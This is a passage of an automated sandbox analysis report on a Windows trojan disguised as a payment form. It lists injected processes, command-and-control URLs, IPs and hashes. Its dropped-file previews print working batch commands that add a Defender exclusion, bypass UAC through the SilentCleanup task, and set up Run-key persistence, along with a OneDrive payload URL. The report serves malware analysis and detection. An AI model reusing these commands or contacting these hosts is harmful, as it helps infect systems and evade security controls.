            DNS: sn-files.fe.1drv.com, pxqklq.sn.files.1drv.com, onedrive.live.com
            Dropped: C:\Users\Public\Libraries\...\Fdhlajk.exe (PE32)
            Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
            15 logagent.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
              22 explorer.exe (injected)
                DNS/IP: www.f9fui8.xyz; www.dragonshipping.com 86.105.245.69 (ports 49762, 49774, 80; TRANSIP-AS, Amsterdam, NL, Netherlands); 20 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Uses netstat to query active network connections and open ports
                34 Fdhlajk.exe: DNS sn-files.fe.1drv.com, pxqklq.sn.files.1drv.com, onedrive.live.com; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes
                  48 mshta.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
                38 Fdhlajk.exe: DNS sn-files.fe.1drv.com, pxqklq.sn.files.1drv.com, onedrive.live.com; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
                  51 secinit.exe: Tries to detect virtualization through RDTSC time measurements
                40 rundll32.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  53 cmd.exe
                    55 conhost.exe
                46: 4 other processes
            18 cmd.exe
              26 reg.exe
                42 conhost.exe
              28 conhost.exe
            20 cmd.exe
              30 cmd.exe
                44 conhost.exe
              32 conhost.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Form_TT_EUR57,890.exe | 20% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | 20% | ReversingLabs | Win32.Trojan.Wacatac

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.0.logagent.exe.10410000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.logagent.exe.10410000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          29.2.secinit.exe.10410000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          26.2.mshta.exe.10410000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          26.0.mshta.exe.10410000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          29.0.secinit.exe.10410000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 | 100% | Avira URL Cloud | malware
          http://www.delhibudokankarate.com/6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.beastninjas.com/6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe
          http://www.mypursuitpodcast.com/6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.dragonshipping.com/6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe
          http://www.vavasoo.com/6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.besport24.com/6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 | 100% | Avira URL Cloud | malware
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          https://www.cdnbest.com/?code=404 | 0% | Avira URL Cloud | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 | 100% | Avira URL Cloud | malware
          http://www.kilbyrnefarm.com/6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe
          http://www.schoolfrontoffice.com/6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          besport24.com | 51.83.52.226 | true | false | | high
          beastninjas.com | 34.102.136.180 | true | false | | high
          www.delhibudokankarate.com | 154.215.87.120 | true | false | | high
          mypursuitpodcast.com | 34.102.136.180 | true | false | | high
          www.vavasoo.com | 64.190.62.111 | true | false | | high
          schoolfrontoffice.com | 34.102.136.180 | true | false | | high
          www.mobiessence.com | 52.58.78.16 | true | false | | high
          www.dragonshipping.com | 86.105.245.69 | true | false | | high
          shops.myshopify.com | 23.227.38.74 | true | false | | high
          kilbyrnefarm.com | 34.98.99.30 | true | false | | high
          www.mylifeinpark.com | 35.186.238.101 | true | false | | high
          www.importexportasia.com | 23.27.129.115 | true | false | | high
          www.kilbyrnefarm.com | unknown | unknown | false | | high
          www.f9fui8.xyz | unknown | unknown | false | | high
          www.trendyheld.com | unknown | unknown | false | | high
          www.schoolfrontoffice.com | unknown | unknown | false | | high
          www.besport24.com | unknown | unknown | false | | high
          www.beastninjas.com | unknown | unknown | false | | high
          onedrive.live.com | unknown | unknown | false | | high
          pxqklq.sn.files.1drv.com | unknown | unknown | false | | high
          www.opticatervisof.com | unknown | unknown | false | | high
          www.mypursuitpodcast.com | unknown | unknown | false | | high
          www.titanusedcarsworth.com | unknown | unknown | false | | high

                                                        Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 | false | Avira URL Cloud: malware | unknown
          http://www.delhibudokankarate.com/6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 | true | Avira URL Cloud: safe | unknown
          http://www.beastninjas.com/6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 | false | Avira URL Cloud: safe | unknown
          http://www.mypursuitpodcast.com/6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 | false | Avira URL Cloud: safe | unknown
          http://www.dragonshipping.com/6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 | true | Avira URL Cloud: safe | unknown
          http://www.vavasoo.com/6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 | true | Avira URL Cloud: safe | unknown
          http://www.besport24.com/6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 | true | Avira URL Cloud: safe | unknown
          http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 | true | Avira URL Cloud: malware | unknown
          http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 | true | Avira URL Cloud: malware | unknown
          http://www.kilbyrnefarm.com/6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 | false | Avira URL Cloud: safe | unknown
          http://www.schoolfrontoffice.com/6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 | false | Avira URL Cloud: safe | unknown

                                                        URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000008.00000000.468015221.000000000095C000.00000004.00000020.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          https://pxqklq.sn.files.1drv.com/y4mAqf93vESEsLAwmv3Js3T3TVTVs9n9BMjWgdbjboex1CPBHIn5H8wAnTdclH8voCt | Fdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.typography.netD | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers8 | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fonts.com | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.sandoll.co.kr | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.urwpp.deDPlease | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.zhongyicts.com.cn | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://www.cdnbest.com/?code=404 | rundll32.exe, 0000001C.00000002.865949851.0000000005342000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.sakkal.com | explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | www.mobiessence.com | United States | 16509 | AMAZON-02 US | false
86.105.245.69 | www.dragonshipping.com | Netherlands | 20857 | TRANSIP-AS Amsterdam the Netherlands NL | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENET US | false
34.98.99.30 | kilbyrnefarm.com | United States | 15169 | GOOGLE US | false
154.215.87.120 | www.delhibudokankarate.com | Seychelles | 132839 | POWERLINE-AS-AP POWERLINE DATACENTER HK | false
35.186.238.101 | www.mylifeinpark.com | United States | 15169 | GOOGLE US | false
23.27.129.115 | www.importexportasia.com | United States | 18779 | EGIHOSTING US | false
34.102.136.180 | beastninjas.com | United States | 15169 | GOOGLE US | false
64.190.62.111 | www.vavasoo.com | United States | 11696 | NBS11696 US | false
51.83.52.226 | besport24.com | France | 16276 | OVH FR | false

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 458655
Start date: 03.08.2021
Start time: 16:14:23
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Form_TT_EUR57,890.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@32/10@29/10
EGA Information: Failed
HDC Information:
• Successful, ratio: 33.3% (good quality ratio 29.9%)
• Quality average: 73.9%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 104.43.193.48, 13.107.43.13, 13.107.42.12, 13.88.21.125, 20.82.210.154, 51.103.5.186, 80.67.82.235, 80.67.82.211, 20.54.110.249, 40.112.88.60, 23.211.4.86
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, l-0004.dc-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, wns.notify.trafficmanager.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/458655/sample/Form_TT_EUR57,890.exe

Simulations

Behavior and APIs

Time | Type | Description
16:15:18 | API Interceptor | 2x Sleep call for process: Form_TT_EUR57,890.exe modified
16:15:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fdhlajk C:\Users\Public\Libraries\kjalhdF.url
16:15:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fdhlajk C:\Users\Public\Libraries\kjalhdF.url
16:15:46 | API Interceptor | 2x Sleep call for process: Fdhlajk.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\KDECO.bat
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 155
Entropy (8bit): 4.687076340713226
Encrypted: false
SSDEEP: 3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5: 213C60ADF1C9EF88DC3C9B2D579959D2
SHA1: E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256: 37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512: FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious: false
Reputation: unknown
Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 702464
Entropy (8bit): 7.145527542958135
Encrypted: false
SSDEEP: 12288:CHuv6TaXda6yswPypNz+w5cUsCPFExCUaMliTE5pPYrfFyA:466ga6ys0Kz+wHpzUEoRYrt
MD5: 811EA41E60760A97B5F28973618728FE
SHA1: EC072CB8CB67785CA7FBA45D36C6264B7EED65CD
SHA-256: E6BD5F8475731BCCA5F6B74327A68EE4B7FA5B0662521FEFF1D92424DA149151
SHA-512: 150A47AFF7F971B4361B59C377358E0B3F29E713F89C8789BEA38D8BF916D71D5CCAF8165756422999213F54DF69F1E0D1E89D120351B162FE03256660AC681F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 20%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!...... ....... .... .. ... ..... .................................................................................................................................................PE..L....^B*............................D.............@..........................@...................@...........................p..\(...0...........................k..................................................pw..D............................text............................... ..`.itext.............................. ..`.data...............................@....bss....t7...0...........................idata..\(...p...*..................@....tls....4............<...................rdata...............<..............@..@.reloc...k.......l...>..............@..B.rsrc........0......................@..@.............p......................@..@................................................................................................

C:\Users\Public\Libraries\kjalhdF.url
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Fdhlajk\\Fdhlajk.exe">), ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 96
Entropy (8bit): 4.888420610714718
Encrypted: false
SSDEEP: 3:HRAbABGQYmTWAX+rSF55i0XMZVJV4ASsGKd7ovn:HRYFVmTWDyz+VUASsb7yn
MD5: 66065C0B71DEE544AB32771C8D17D790
SHA1: 2CD3B71D32CC304ADDECDB89ACE0134364A3DCD0
SHA-256: A5F477EEC9B9631F0222BF481117E47093ABAA06C1178B941825BF4D2EE3100F
SHA-512: CA639F6551339CAB9DF8260BEB3C0D0A3F40DC6B0901FB5ABE2F10CC2D076674355CC3462AD90DE7D179B2F5ECB5166A5457B5F97D935180DE078A0E0FDCBFB1
Malicious: false
Yara Hits:
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\kjalhdF.url, Author: @itsreallynick (Nick Carr)
Reputation: unknown
Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Fdhlajk\\Fdhlajk.exe"..IconIndex=3..

C:\Users\Public\Trast.bat
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 34
Entropy (8bit): 4.314972767530033
Encrypted: false
SSDEEP: 3:LjTnaHF5wlM:rnaHSM
MD5: 4068C9F69FCD8A171C67F81D4A952A54
SHA1: 4D2536A8C28CDCC17465E20D6693FB9E8E713B36
SHA-256: 24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
SHA-512: A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
Malicious: false
Reputation: unknown
Preview: start /min C:\Users\Public\UKO.bat

C:\Users\Public\UKO.bat
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 250
Entropy (8bit): 4.865356627324657
Encrypted: false
SSDEEP: 6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
MD5: EAF8D967454C3BBDDBF2E05A421411F8
SHA1: 6170880409B24DE75C2DC3D56A506FBFF7F6622C
SHA-256: F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
SHA-512: FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
Malicious: false
Reputation: unknown
Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..

C:\Users\Public\nest
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 9
Entropy (8bit): 3.169925001442312
Encrypted: false
SSDEEP: 3:an:an
MD5: 4ED4AE38C3E03B184BC7334DC4856335
SHA1: 8BD720F1E99495D1865663737482D2A024FF03A9
SHA-256: CAD47A79A1BB52E766B915D2C6E10AAF4DD26FCD622278635043FC33FD5FAF26
SHA-512: D250939C49EC79201CBF6140B73771C59912B5F85DAD70D1915636938A0B445562D346D87301CBCA4D36C6D782F5E571A9A0BC763E658C2C820A14609FBEF94C
Malicious: false
Reputation: unknown
Preview: Fdhlajk..

C:\Users\Public\nest.bat
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 53
Entropy (8bit): 4.263285494083192
Encrypted: false
SSDEEP: 3:LjT9fnMXdemzCK0vn:rZnMXd1CV
MD5: 8ADA51400B7915DE2124BAAF75E3414C
SHA1: 1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
SHA-256: 45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
SHA-512: 9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
Malicious: false
Reputation: unknown
Preview: start /min reg delete hkcu\Environment /v windir /f..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\Fdhlajkqzshwymncekoaweuudqrkiey[1]
Process: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
File Type: data
Category: downloaded
Size (bytes): 274944
Entropy (8bit): 7.99609137175565
Encrypted: true
SSDEEP: 6144:2WMYR+e/cgMIdaEbxn7qFOuOkfAe2Z0PjjCGKpM39s2eGXTGsG6v:2o6+a4NqFZ1Y0Pj+n7lQ
MD5: B9CB610A00F7B9437BC7A3B900127957
SHA1: BBAF86A0E368B1A40A76EF96091BA13A1C17412A
SHA-256: C0411F5E7F35FFED8CE1FDCFEFF7E0C90FCCA62B89895BD14314705EF8404A64
SHA-512: 5E17785DD104A86364F0A643AEDEF1B5594173EEF10E1587EDE56493374B33ACE3CEF6CF47C7E3902E9E279CD307E76D3420EFB12D266D8E837BC2E1E3954706
Malicious: false
Reputation: unknown
IE Cache URL: https://pxqklq.sn.files.1drv.com/y4m641rkE9auVPSdhWwPjdTtM26bhtzrxqu3Ws5cLechOaa-Ew2GgA9YjCez1BWH7nhy3rCE39ylgB73ZmApCXYC-jTr-71SUscX_W7iORBv3c-lL9IVSMDQB0gMuugpPCm_DT5OW1IimWPVN-MULBX1uHxg7JH0WYvj5QnBEub1eNlUT9l2BSoTJ2hVY85iENH4xTePyDuwcfsutsiGPcpFw/Fdhlajkqzshwymncekoaweuudqrkiey?download&psid=1
